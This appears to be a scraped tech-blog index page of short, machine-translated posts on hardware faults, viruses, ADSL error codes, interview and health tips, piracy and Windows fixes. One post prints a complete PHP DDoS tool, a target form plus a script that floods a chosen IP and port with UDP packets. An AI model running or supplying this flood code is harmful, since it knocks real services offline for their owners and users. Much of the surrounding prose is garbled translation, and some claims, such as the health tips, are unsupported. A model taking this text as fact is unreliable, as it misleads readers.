CPU Troubleshooting

CPU Troubleshooting

1.The noise of the chassis.

Fault phenomenon: to upgrade the CPU, the computer every time you turn noise particularly large. But after a while, the voice returned to normal.
Fault Analysis and Processing: First check whether the CPU fan fix bad chassis work and structure of some low-quality, easily in the boot of work caused by resonance, increased noise, in addition to the CPU fan and chassis fan motor add a little oil to try. If it is, it is best to replace the chassis because the chassis of the box single book.

2.The temperature rising too quickly.

Fault phenomenon: a computer running when the CPU temperature rose quickly, boot and only a few minutes the temperature rose from 88 ° F to 124 ° F and when 128 ° F to stabilize, no longer rising. Read more

Common Classification of Computer Viruses

Common classification of computer viruses:

1.Of the parasitic way into the boot-type computer virus file virus and compound-type virus
The boot virus is parasitic in the disk boot sector or master boot sector computer virus. The virus system boot, the Lord does not guide the contents of the area to the correctness of the shortcomings of discrimination in the process that led system into the system memory-resident monitoring system is running standby transmission and destruction. Can be subdivided in accordance with the location of boot virus parasitic on the hard disk master boot record viruses and partition boot record virus. The master boot record virus infected hard disk master boot sector, such as cannabis virus 2708 virus, torch virus, etc.; active partition boot record, partition boot record virus infected hard disk, such as small ball viruses, Girl, virus.

Read more

What Was The ENIAC?

What Was The ENIAC?

ENIAC was the world's first computer.The ENIAC contained 17,468 vacuum tubes, along with  10,000 capacitors, 70,000 resistors,1,500 relays, 6,000 manual switches and 5 million soldered joints. It covered 1800 square feet (167 square meters) of floor space, weighed 30 tons, consumed 160 kilowatts of electrical power. There was even a rumor that when turned on the ENIAC caused the city of Philadelphia to experience brownouts, however, this was first reported incorrectly by the Philadelphia Bulletin in 1946 and since then has become an urban myth.

eniac

University of Pennsylvania has established a special brands to the ENIAC

Read more

Several Ways to Generate a Random Password Using PHP

Several Ways to Generate a Random Password Using PHP 

Using PHP to develop applications, especially web application is often necessary to generate a random password to generate a random password, such as user registration, user reset the password to generate a random password. Random password is a string of fixed-length string, I collected several methods to generate a random string for your reference.

Way 1:

1. In 33 - 126 to generate a random integer, such as 35.

2. 35 will be converted into the corresponding ASCII characters, such as 35 corresponding to #. Read more

Super computers have Simulate the Effect of the Trillion-Ton Nuclear Bomb to Destroy Collision-Earth Asteroids

Super computers have simulate the effect of the trillion-ton nuclear bomb to destroy collision-Earth asteroids

The U.S. government's Los Alamos National Laboratory, scientists conducted a computer simulation.  In the simulation, they launch a 1 trillion-ton bomb, bombardment of a flying giant asteroid of the Earth, with a powerful explosive power to destroy the asteroid, and thus save the planet.

Los Alamos National Laboratory is located in New Mexico, part of the U.S. Department of Energy. In this laboratory, the scientists used a super computer simulation of a nuclear bomb bombardment of asteroids, in order to understand the effectiveness of this approach. The simulated asteroid is 1650 feet long (about 500 meters), to use nuclear bombs to reach a trillion-ton is about 50 times that of the United States during World War II atomic bombing of Nagasaki, Japan. Read more

The Complete Error Codes in ADSL Connection Service Part 2

The complete error codes in ADSL connection service part 2

ADSL Error Code - Description

700 The expanded command in the device .INF file is too long.
701 The device moved to a BPS rate not supported by the COM driver.
702 Device response received when none expected.
703 ERROR INTERACTIVE MODE
704 ERROR BAD CALLBACK NUMBER
705 ERROR INVALID AUTH STATE
706 ERROR WRITING INITBPS
707 X.25 diagnostic indication.
708 The account has expired.
709 Error changing password on domain.
710 Serial overrun errors were detected while communicating with your modem.
711 RasMan initialization failure. Check the event log.
712 Biplex port is initializing. Wait a few seconds and redial.
713 No active ISDN lines are available.
714 Not enough ISDN channels are available to make the call.
715 Too many errors occurred because of poor phone line quality.
716 The Remote Access IP configuration is unusable. Read more

The Complete Error Codes in ADSL Connection Service Part 1

The complete error codes in ADSL connection service part 1

ADSL Error Code    -     Description

600 An operation is pending.
601 The port handle is invalid.
602 The port is already open.
603 Caller‘s buffer is too small.
604 Wrong information specified.
605 Cannot set port information.
606 The port is not connected.
607 The event is invalid.
608 The device does not exist.
609 The device type does not exist.
610 The buffer is invalid.
611 The route is not available.
612 The route is not allocated.
613 Invalid compression specified.
614 Out of buffers.
615 The port was not found.
616 An asynchronous request is pending.
617 The port or device is already disconnecting.
618 The port is not open.
619 The port is disconnected.
620 There are no endpoints. Read more

Problem of Installing Microsoft Lifecam Cinema

Problem of Installing Microsoft Lifecam Cinema

When you are installing the Microsoft LifeCam softwares, and then you plug in the LifeCam Cinema hardware, the LifeCam Cinema hardware will be not detected. Additionally, in the Device Manager, the properties for the LifeCam entry display one of the following codes or different codes:

1,10, 19, 28,39

Now let 's solve the problem with the following ways:

1.Update the LifeCam drivers Cinema

  1. Open the Device Manager.Click Start ,and  type devmgmt.msc in the Start Search box, press ENTER.
    If you are prompted for an administrator password or for a confirmation, type the password, or click Continue.(In Windows XP, you can just run devmgmt.msc)
  2. Expand the following entries:Sound, video , and game controllers,Imaging Devices.Look for the black exclamation point (!) on a yellow field next to a device. The exclamation point indicates that the device has a problem. Right-click the device, and then click the option that corresponds to your version of Windows:

How To Make Windows 7 Boot Faster

How To Make Windows 7 Boot Faster

So here is the solution how to manage your startup programs and make your windows 7 boot faster. Click Begin and input "msconfig" within the Run box. Then press OK button. You will see all the services and applications which will be started automatically when your computer boots. Disable those unnecessarily items and re-boot your computer. You will see the improvement of your windows 7 boot up speed. Read more

65 Skills to Introduce Yourself During the Interview (4)

65 Skills to Introduce Yourself During the Interview (4)

46. What is your previous one reason for leaving?

Answered Tip:
1. The most important thing is: the candidates make to find recruiters believe that candidates in the previous units "Reason for leaving" does not exist in this hiring.
2. To avoid too detailed, too specific reasons for departure.
3. Do not doped subjective negative feelings, such as "too hard" and "complex interpersonal relations", "Management is too confusing," the company does not focus on talent, "the company exclusion of certain of our employees".
4. But can not dodge, evade, such as "want a change of environment", "personal reasons".
5. Can not involve their own negative personality traits, such as dishonesty, laziness, lack of sense of responsibility not easygoing.
6. As far as possible the reasons explained in the personal image of the candidate luster.
7. Examples: "I am leaving because of the collapse of this company; I worked for three years in the company, there are deeper feelings; from the beginning of last year, the mutations due to market conditions, the company's situation worsened; to now this step, I think Unfortunately, but also face re looking to play my ability to stage the same interview questions is not only an answer with an answer is not in any interview occasions are valid, the key candidates to master the law , to grasp the specific circumstances of the interview, and consciously try to figure out the psychological background of the interviewer to ask questions, and then match up. Read more

65 Skills to Introduce Yourself During the Interview (3)

65 Skills to Introduce Yourself During the Interview (3)

31. And you appreciate what kind of character?

Answered Tip: honest, flexible and easy to get along with people, "real action".

32. How do you normally handle criticism?

Answered Tip:
1.The silence is golden, do not say anything, otherwise the situation is worse, but I will accept constructive criticism. 2. I will wait for everyone to calm down and discuss it.

33. How you handle your failure?

The prompt answer: all of us was born perfect, I believe I have a second chance to correct my mistake. Read more

65 Skills to Introduce Yourself During the Interview (2)

65 Skills to Introduce Yourself During the Interview (2)

16. Whether to participate in a training course? Talk about the contents of training courses. Company-sponsored or at their own expense to participate in?

The prompt answer: at their own expense to participate in training courses of Jade Bird (you can talk more about their own learning techniques).

17. Do you know about our company?

Answered Tip: go to the company before the interview, check the Internet at the company's main business. If the answer: Your company intends to change its strategy to strengthen cooperation with foreign manufacturers, OEM and part of its own brand through overseas distributors.

18. Please state the motivation you choose this job?

Answered Tip: want to know the enthusiasm and understanding of the interview on this work, and filter on a whim from the examination of the person, if inexperienced, stressed that "even rank different, and also hope to have the opportunity to play before experience ".

19. What you do best direction? Read more

65 Skills to Introduce Yourself During the Interview (1)

65 Skills to Introduce Yourself During the Interview (1)

1. Would you please introduce yourself about your own?

Prompt answer: Most people answer this question too ordinary, just say the name, age, hobbies, work experience, these have on the resume. In fact, most want to know the job seeker's ability to perform the work, including: the strongest skills, the most in-depth knowledge of areas of research, the most active part of the personality, the most successful things done, the main achievement of these all OK and learning, and learning, but to highlight the positive personality and ability to do things right to reasonable business will not believe it. Enterprises attach great importance to the courtesy of a person's job seekers have to respect the examiner, said in answer each question a "thank you" and companies like polite job-seekers.

2. Do you think the biggest advantage is your personality?

Answered Tip: calm, well-organized, stand firm, tenacious up, helpful and caring, adaptability and sense of humor, optimism and friendliness.  Jade Bird after one to two years of training and project combat, plus internship, make me fit for the job. Read more

The Whole Story of the Chinese Scholars Protest Against the World Bank

The Whole Story of the Chinese Scholars Protest Against the World Bank

Before the start of the conference, the independent scholar named Du Jianguo clearly expressed their opposition of this report, he said the plan will only undermine the Chinese companies, Western competitors.
Du Jianguo distribution of a paper, "World Bank in the field, bring your poison and go back to the United States. He shouted at the scene, the United States is to use the privatization of poison to destroy China's economy, China must not repeat the old path of the United States. "

the Chinese Scholars Protest Against the World Bank

the Chinese Scholars Protest Against the World Bank

Were forcibly sent out the venue before, Du Jianguo said that China must not repeat the old path of the United States, must not engage in the privatization of banks, Wall Street bankers are liars and parasites, they harm the United States, and now want to harm China. Read more

How to Create a Secret Folder the Others Can not Open

How to Create a Secret Folder the Others Can not Open

1.Click the "Run", type CMD, enter, then enter the CMD mode (command prompt).

2.In the command prompt type the command "md d:\secret..\"(there are two periods).Then you can see then secret. folder in the d:\ root directory.

3.You can try to double-click the folder,how,it will prompt an error.Now nobody can open this folder,Then you can copy some files which you want to hide,such as commercial confidentiality and any private pictures and so on.And it can not be deleted.It is very safe. Read more

the Eight Major Advantage of Host Using the Independent IP

the Eight Major Advantage of Host Using the Independent IP

1.To reduce the probability of the IP blocked.If a virtual host in the independent IP virtual host server was penalized to block IP by the violation content, the same server independent IP virtual host as IP address is independent will not be affected;

2.From attack implicated. Independent IP virtual host being attacked by hackers, IDC can be promptly informed of the server which virtual host to be attacked, then make the appropriate countermeasures, and attacked virtual host is independent of the IP, so it will not affect the same server other virtual hosts. Read more

168 Tips for Health Benefits

168 tips for health benefits

1.washing feet by cold water is harmful to health.
2.Summer eating more bitter is benefit to health.
3.drink plenty of water can prevent kidney stones.
4.the summer should not be naked body to sleep.
5.in winter keeping health should eat hot porridge.
6.in winter baths should not be more.
7.in winter should not be long-term stay in a warm room.
8.in winter should not stay long in the mist. Read more

What is the Android Mobile Phone System Root Access? How to Obtain Android Root Access?How to Use the Android Root Apps?

What is the Android mobile phone system root access?, I need it to do what? How to obtain android root access?How to use the Android root apps?
Android root is the nerve center of the phone, it can access and modify your cell phone almost all the documents, these things may be making mobile phone companies do not want to you to modify and touch things, because they are likely to affect the stability of the phone, but also easy to Some hacking (Root is the super administrator user account in Linux and other UNIX system, the account has the right of the entire system to the supreme, all the objects he has the right to operate)
Since the Android root privilege is so important, why do we need to get it?

Read more

Symantec Ghost Images

symantec ghost images

Ghost software is the symantec offering a good hard disk backups reduction tools, can realize FAT16, FAT32, NTFS, OS2 and so on many kinds of hard disk partition division and the format of the hard drive of backup reduction.

Features: Ghost backup reduction is the hard drive for the sector units, that will be a hard drive in the physical information complete copy, and not just a simple copy of data; Human cloning clone body only, but the Ghost but it can clone system all things, including voice animation image, even the disk fragment can help you copy. Ghost division or hard drive support will directly backup into an expansion called. Gho file (image files), also support directly to another backup division or hard disk. Read more

Piracy-Infested Japanese Adult Video Market

Piracy-infested Japanese adult video marketAccording to the police investigation in Japan, the largest source of revenue is one of the Japanese underworld underground adult video sales. In fact, it comes to the underworld adult movie sales of a Sayings: sleight of hand tricks. Although there has been talk about the many Japanese adult film companies have triad background, there is little direct access to shoot the company's own surgeon shooting the yokel rarely know the actual shooting techniques but with unlimited copy the movie to issue to get the most profit. Until replication means from VHS and other means to enter the world of the network with triad background underground adult film distributor or continue uncontrolled copy any adult films, these copies of the profits will not give original filming party, adult film to copy the traditional vendors to make money until the continuing today, whether it is Tokyo's Kabuki-cho, Osaka Namba hidden in a small way sales without amendment of the underground movie shop in Japan . Or mosaic download online so-called membership system in Japan are actually the epitome of this uncontrolled replication of the sale and purchase of adult film.

Adult film Hot Springs series

 

30 years ago, the kind of copy VCR copy of the very poor is not the same as the Japanese market for the pursuit of quality, has been demanding that the Japanese electrical manufacturers to improve recording technology. VHS after laser discs, and the so-called high-quality DVD, but this compact disc can not be any copy, so welcomed from Japanese vendors, until ushered in VCD and DVD era, when Japan had just developed the VCD after the Hong Kong businessman favor, because this technology is simple, repeated copy of the original DVD is not. The Japanese market also ushered in a tide-like VCD era, but for VCD cheap difficult to control the core technology, Japan has started trying very hard to develop a greater capacity DVDs, between Toshiba and Sony's development initiative of the dispute, Finally, in Japan in 2001 launched a real adult film "D  MODE", HD quality makes Japanese adult movie vendors proud to say: like cinema quality video can be copied at home.

Aoi Sora starred in Hot springs series

Aoi Sora starred in Hot springs series

Japan is now a lot of adult films, including underground vendors selling adult movie of two ways: First: from the United States and other overseas film, adult films have a lot of euphemisms and content in the Japan open, public sale, adult film has a mosaic, so that the U.S. does not mosaic, high horse-white adult films through underground channels into the Japanese become one of the major new sources of Japanese underground adult film. : Japan's exports to the domestic adult movies, many Japanese adult movies, to accept orders for overseas adult film, these films are exported to overseas, so the original version of these films should be handed over to overseas vendors, while Japan overseas sales of adult movies, be required to remove the original movie with mosaic, become a mosaic of adult movies. So the Japanese underground adult movie vendors will also get these high quality adult movies in the original (non-mosaic), bulk copy without let or hindrance into the Japanese market. Among them Iijima, "a girl in the afternoon, the original mosaic to cover sales in Japan soon, but the vendors in the Philippines requires that the sales of the film, so when shortly after the original to the vendors in the Philippines, the Japanese market also no code Iijima film, the original copyright side did not get a profit of one point. The same situation recently waited in vain actress Aoi starred in the "hot spring ping-pong" with triad background underground film Vendor little effort to get maximum profits.

Japan s adult film legend Iijima

Replication technology a master replication after 5-6 disc movie film's picture quality will become poor, the computer age, a DVD, from the first copy, layer copy, a vendor to another seller removed several times, the result is that it is not to change the quality, some shooting in order to protect their own interests and even reimbursement of genuine requirements of the underground film vendors, while providing no mosaic (in the film) the film's original. According to my survey, 90% of the Japanese sales of non-mosaic (in the movie) film from overseas exports to the domestic, like the "D? MODE" so that a specific adult movie of the story has disappeared, leaving only what The only shot of Contributors or videotaping of the Japanese adult film. Japan is now able to see the non-mosaic (in the movie) the movie certainly is one hundred percent of the piracy, rather than the entire market share of genuine piracy: 1; 30, mouth shouted to combat piracy of Japan, in fact, already is the world of piracy.

The Problem of Hal.dll Is Missing or Corrupt

The Problem of Hal.dll Is Missing or Corrupt

When i boot my laptop it displayed Windows could not start because the following file is missing or corrupt:\system32\hal.dll (Please re-install a copy of the above file).So my computer could not boot and my system is Windows XP.What is wrong of the hal.dll missing?

Hal.dll  (Microsoft Windows Hardware Abstraction Layer DLL )is Windows hardware abstraction layer module.This happens, generally there are two possible reasons:

1.The boot.ini file is a problem.Now one-click restore, or multi-system, will change the boot.ini file. The solution is actually very simple, in this case, in fact,you can enter the safe mode. Into safe mode, set the boot.ini back to normal .

2. The hal.dll is wrong version or missing hal.dll file.

3.The harddisk is broken.

Solution:
(1).Copied from another machine on the C: \windows\system32\hal.dll to the problem machine. (via DOS boot disk or WinPE boot system) This method is suitable for abnormal shutdown due to power outages, crashes, etc. caused by the boot system, when only the boot sector root directory of the boot files are missing, of hal.dll file and there is no problem.
 
(2).Insert the XP installation disk, restart your computer, select the Recovery Console. Follow the prompts to enter the winnt directory. At the DOS prompt, enter: expand x:\i386\driver.cab / f: of hal.dll c:\windows\system32\(x: is the cd-rom drive letter) used again to expand first halaacpi.dll copy to c:\winindows\system32\, and changed its name to the hal.dll restart the computer, then copy halacpi.dll (because the hal.dll source file name is halacpi.dll). renamed after the restart, then restart.
 

How to Completely Remove Windows.edb File ?

How to completely remove windows.edb file ?

 What is windows.edb file that path is C: \ProgramData\Microsoft\Search\Data\Applications\Windows\windows.edb in Windows 7 ?
This file is generated by the index function, you can speed up the search, the continuous increase in the index file, the file size will continue to increase, reach a few hundred megabytes or even gigabyte, and delete, if does not turn off the Indexing Service, then the file will continue to appear. To completely remove very simple, in computer management settings, close the "Windows Search" service can be.

It is very simple, disable the windows search service. Then delete the file.

Second, click "Start"
Search for "the Indexing Options" (entered without the quotes).

To change the Windows search
Advanced - index location - Select a new location

Above is to move windows.edb in order to take up system disk space savings.If you do not want to disable the index can only be the case.
And if you consider windows.edb this stuff is too much you could reduce the number of index position.

 

PHP DDoS Attack Source Code

PHP DDOS Attack source code


index.php
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>
DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8″>
<meta name="author" content="">
<title>PHP DDoS Attack</title>
</head>
DDoS –>
<style type="text/css">
<!–
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}
–>
</style>
DDoS –>
<body>
<center>
IP: <?php echo $ip; ?> (don't use your ip)
<br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="<span class=" />ip" size="15″ maxlength="15″ value ="0.0.0.0″ onblur = "if ( this.value==" ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0') this.value = ";">
&nbsp;
Time:
<input type="text" name="<span class=" />time" size="14″ maxlength="20″ value = "time(second)" onblur = "if ( this.value==" ) this.value = ‘time (in seconds)’;" onfocus = " if ( this.value =='time (in seconds)') this.value = ";">
&nbsp;
Port:
<input class="hiddenSpellError" type="text" name="port" value="socket" size="5" />onblur = "if ( this.value==") this.value ='port';"onfocus=" if (this.value=='port') this.value=";">
<br><br>
<input type="submit" value="attack&gt;">
<br><br>
</form>
</center>
<!– PHP DDOS–>
</body>
</html>

function.php
<?php
$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_POST['time'];
$time = time();
print "Flooded: $ip on port $rand";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out.= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip",$rand,$errno,$errstr,5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (".round(($packets*65)/1024, 2)." mB) packets averaging ".round($packets/$exec_time,2). " packets/s \n";
?>

DDoS Attacks PHP Hash Vulnerability Causes of

DDoS attacks - PHP hash vulnerability causes of

DDoS PHP Attacks Vulnerability Principle:

Rely on the appropriate language of the hashtable/hashmap is the implementation process (request more than this structure), when different key deposit if the hash values are equal while the linked list connected to the front. This exploits the collision the same hash is worth to a long linked list, re-get the map calculation process the time complexity of the huge increase, originally a simple process will become a very expensive cpu process.

Impact on: Read more

How to Stop Distributed Denial of Service ( ddos attacks)

How to Stop Distributed Denial of Service ( ddos attacks)

 

DDOS is an acronym of Distributed Denial of Service .Defense Distributed Denial of Service ( ddos attack) is a systematic project, the DDOS attack is distributed, the concerto a wider range of large-scale offensive battle, of course, its ability to destroy before the less. It also makes the DDOS prevention work more difficult. Want to rely solely on the server of some kind of system or anti-anti-flow attack guard DDOS is unrealistic, be sure to completely eliminate DDOS is not possible, through appropriate measures against 99.9% of the DDOS attack can be done the sake of attack and defense has a cost overhead, through the appropriate way to enhance the ability to withstand DDOS, which means increased cost of attackers, then the vast majority of the attacker will not be able to continue to give up it is equivalent to the successful defense of a DDOS attack.
With the growing popularity in recent years, traffic attack wantonly spread on the Internet, the dangers of DDOS attacks escalated, the face of the potential variety of unpredictable attacks, more and more enterprises was overwhelmed and powerless. Single high anti-anti-traffic attack server as a powerful firewall, like the problem can be resolved is limited, while the cluster of high anti-anti-flow attacks, nor is the general business can grasp and use. How to ensure that the conditions of victims of DDOS attacks, the server system to normal operation or to reduce the dangers of DDOS attack? Read more

What is the Mobile Cloud Computing ?

Mobile cloud computing is the usage of cloud computing in combination with mobile device. Cloud computing exists when tasks and data are kept on the internet rather than on individual devices, providing on-demand access.

Applications are run on a remote server and then sent to the users. Because of the advanced improvement in mobile browsers thanks to Apple and Google over the past couple of years, nearly every mobile should have a suitable browser. This means developers will have a much wider market and they can bypass the restrictions created by mobile operating systems. Read more

How to Make a Dos Bootable Floppy

How to Make a Dos Bootable Floppy

We had introduced the What is the bootable floppy,but how to make a dos bootable floppy. When there is an error in your boot sequence, a dos bootable floppy can help you to access your operating system to solve this problem.The following is how to make a dos bootable floppy for Windows XP.

Read more

What is the Bootable Floppy?

What is the Bootable Floppy?

Many people do not know what is the bootable floppy, it is very simple.The bootable floppy is the diskette contained a back-up copy of your hard disk master boot record (MBR). When the master boot record becomes "infected" by the boot virus, if having a bootable floppy will allow you to load it back onto your hard disk. Otherwise, you must have to reformat your harddisk which first erases everything on the disk including files you may not have a backup copy of. Even if you do that will mean you need to restore everything you've backed up, it will lost much time to complete.

If you want to make a dos bootable floppy ,you should read this post:How to Make a Dos Bootable Floppy?

 

What is the World’s First Computer?

What is the world's first computer?Somebody does not kown the first computer who designed.Now let us introduce the world's first computer.first computer in world ENIAC

February 14, 1946, the world's first computer ENIAC (Electronic Numerical Integrator And Calculator) was born  at the University of Pennsylvania . During World War II, the U.S. military asked the University of Pennsylvania  Ph.D. Mauchly and his Students Eckert ot design to replace the vacuum tube relay "electronic" computer - ENIAC (Electronic Numerical Integrator and Calculator), Electronic Numerical Integrator and Total Calculator). Read more

Use Windows 7 USB/DVD Download Tool to Create a USB Boot Disk to Install the Windows 7 System

Use Windows 7 USB/DVD Download Tool to create a USB boot disk to install the Windows 7 system

We need two conditions: Windows 7 USB/DVD Download Tool; and Windows 7 ISO file.First of all, we need to download a tool: Windows 7 USB/DVD Download Tool. Please click here. (http://images2.store.microsoft.com/prod/clustera/framework/w7udt/1.0/en-us/Windows7-USB-DVD-tool.exe)

Double-click to open this tool, click Browse to find the Windows 7 ISO file, press Next , Read more